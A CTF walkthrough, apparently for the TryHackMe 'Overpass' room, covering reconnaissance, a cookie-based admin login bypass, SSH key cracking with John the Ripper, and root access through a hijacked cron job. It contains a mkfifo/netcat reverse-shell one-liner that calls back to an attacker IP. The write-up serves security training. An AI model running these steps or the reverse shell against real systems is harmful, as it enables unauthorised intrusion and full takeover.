# Overpass ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJJvJdiThVEegFoNh2%2F-MbJKEnssg3OjSU-8jum%2Fimage.png?alt=media\&token=ebb6e6cb-3fd3-46f5-92af-c2b32804affc) ## Reconnaissance Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**) ``` nmap -Pn 10.10.48.148 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJKFzxr6IZSyHBZm4L%2F-MbJL-uIovZr6Co0Hjam%2Fimage.png?alt=media\&token=d70500ff-d17d-4d89-92f4-4a677cb98dcb) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 22,80 * (**-oN nmap**): Saving it into a files called nmap ``` nmap -sV -sC -p 21,22,80 -oN nmap 10.10.48.148 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJKFzxr6IZSyHBZm4L%2F-MbJL4lQjtVPgy9MxZpc%2Fimage.png?alt=media\&token=020a3cb0-3837-4a85-bde9-d1f817591530) ## Enumeration Lets visit the website ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJKFzxr6IZSyHBZm4L%2F-MbJLGYKPWDDr09bRt-z%2Fimage.png?alt=media\&token=f7e407ad-18a3-46e3-b90e-e6e6c6984c78) There is nothing of interest as of now, so lets run `gobuster`to find hidden directories. ```bash gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.48.148/ ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJM-vDXiHBXe3TiTp0%2Fimage.png?alt=media\&token=1646abb9-0e6e-4014-811c-02af19bedffe) We find an `admin` page, lets visit it. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJMRAzolM_FCSzivkY%2Fimage.png?alt=media\&token=a159e2b8-7f6e-4c7d-926a-f56591b19854) Its a login page, after looking through the different files in the source code of the page, I found a interesting file called `login.js`, and the interesting part is the function called `login` ```bash async function login() { const usernameBox = document.querySelector("#username"); const passwordBox = document.querySelector("#password"); const loginStatus = document.querySelector("#loginStatus"); loginStatus.textContent = "" const creds = { username: usernameBox.value, password: passwordBox.value } const response = await postData("/api/login", creds) const statusOrCookie = await response.text() if (statusOrCookie === "Incorrect credentials") { loginStatus.textContent = "Incorrect Credentials" passwordBox.value="" } else { Cookies.set("SessionToken",statusOrCookie) window.location = "/admin" } ``` Looking at the if statement, so if we login with incorrect credentials, the response we get is I`ncorrect credentials`, but on the other hand if we get the right credentials, it sets the `SessionToken` cookie to the value `statusOrCookie` and points us to the `/admin` page. So lets go to the Console `(Ctrl + Shift + i)` of the web page and type this in the console. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJQLEDN7SjA5w19kgc%2Fimage.png?alt=media\&token=fb8503a1-e93b-4d18-b76b-67d6c2c555d8) Once you click enter and reload the page, you are logged in. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJQSUG77SXNe6-Qr5q%2Fimage.png?alt=media\&token=20bd28ed-295c-475d-a16a-020e83cf048f) You are given a RSA Private key, so we can copy this, crack the password using john the ripper and then login with ssh. I copied the RSA private key and stored it in a file called id\_rsa ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJQqcBHB0WJySeF81z%2Fimage.png?alt=media\&token=d2194ee3-3c8b-42dc-b02b-a06692b5a224) Now we need a password to login with ssh, so lets crack it with `ssh2john`. ```bash /usr/share/john/ssh2john.py id_rsa > id_rsa_hash ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJR37lljU6KPwHPjb3%2Fimage.png?alt=media\&token=3c667fc9-2663-4dae-8a81-a83ebc2a4f81) Now lets crack the hash with `johntheripper` ```bash john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJRMjVTDrk_gL0L94R%2Fimage.png?alt=media\&token=f1c0d927-e347-4496-9d5c-03f0ad596719) We found the password which is `james13`. Now to login with this information we need to first give permissions to the `id_rsa` file. ```bash chmod 600 id_rsa ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJRec-jzZBskG-1Vsh%2Fimage.png?alt=media\&token=eee136f9-8eba-4df5-8b9d-7907dba4f7fc) And now we can use this command to login through ssh, I think the username is going to be james as the password has the word james in it. ```bash ssh -i id_rsa james@10.10.48.148 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJRxu4F6G9eTqjhbHA%2Fimage.png?alt=media\&token=528b491a-67f8-4218-9719-4054dbd595d1) We can now read the `user.txt` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJS8New5d7wcq4YgaF%2Fimage.png?alt=media\&token=8365f1b8-e9ee-43bc-806c-1cd352365d07) ## Privilege Escalation We cannot run the command `sudo -l` to see what we can run as root as we don't have the password for james. In the directory we are in, we see a file called `todo.txt` so lets read the file ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJSpv07dZNDJ3FXZzG%2Fimage.png?alt=media\&token=44b2d4ff-143d-4f8a-bc3f-4e8f42d48ba4) From this we can say that * There is a password somewhere in the password manager they made * The encryption for the password is weak * There is a automated build script running. There is also another interesting file in this directory, which is called `.overpass` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJTLLroVixTTLMJwDH%2F-MbJTeYBRdl24tglfHVi%2Fimage.png?alt=media\&token=1fbdf794-98a0-4fc0-b754-b5d97b09cbec) Lets read the file ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJTLLroVixTTLMJwDH%2F-MbJTs-hgJE1lbbg63vp%2Fimage.png?alt=media\&token=8b7cce07-f434-4d88-8c94-f77fef97ff82) Its looks like some type of code that has been modified, so lets go to [CyberChef ](https://gchq.github.io/CyberChef/)and see what it says. I went though different recipes and found the correct one which is `ROT47`. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJTLLroVixTTLMJwDH%2F-MbJUBejmQ01939bcsbt%2Fimage.png?alt=media\&token=a6ea06b6-a9cb-47d0-bb94-46e4be509b70) I looked for way to use this information to privilege escalate to root, but it did not help in any way, so we need to find another way. Looking back at the `todo.txt` file, we saw that there was an automated build script running, lets check that. ```bash cat /etc/crontab ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbK-PE749HjgAs-xawb%2F-MbK2DTlh5E-vg92FWoO%2Fimage.png?alt=media\&token=be84a63c-01f7-411d-9f4b-5bd9b31d5f16) Looking at the last line, we can see that the cronjob fetches the `buildscript`file from the website and pipes it to bash. To exploit this we need to redirect the domain to our IP address. We can do that by adding our Try Hack Me IP to the `/etc/hosts` on this machine. We need to replace the IP of `overpass.thm` with our IP. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbK-PE749HjgAs-xawb%2F-MbK2v5UyoQAyGB6AX-l%2Fimage.png?alt=media\&token=7c8db268-f490-4b2b-9a48-f0deea2166ec) Now we need to create a similar directory structure as the one in the victim machine so that the exploit can work properly, so lets create the directory `download/src` ```bash mkdir -p downloads/src ``` Now we should create a file called `buildscript.sh` and add a reverse shell to it as then we can get a reverse shell while is runs every few minutes because it is a cronjob. We can find the reverse shell [here](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet). ```bash echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f' > buildscript.sh ``` And now we have to start a http server using python (make sure you are two directories behind which means that you can cd into `/downloads/src`) so that the victim machine can connect to our machine and also start a netcat listener to listen on the reverse shell. ```bash python3 -m http.server 80 ``` ```bash nc -lvnp 1234 ``` After a while, the file should be downloaded ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbK47vdi30002z1bdPt%2F-MbK4zsksm_qLEB6sHxf%2Fimage.png?alt=media\&token=263d511e-0a9b-4c2b-acb6-f3310f5e710f) And you should also get a reverse shell, and as root ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbK47vdi30002z1bdPt%2F-MbK55hTpoCTD0PCz-lu%2Fimage.png?alt=media\&token=96644c1b-51b0-48cf-bbde-4198851f3c35) Now you can read the `root.txt` file and answer the last question of this room ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbK47vdi30002z1bdPt%2F-MbK5GX-kgd-TuejScDa%2Fimage.png?alt=media\&token=ce08132d-33b7-4a74-a67b-3a39f39e324b)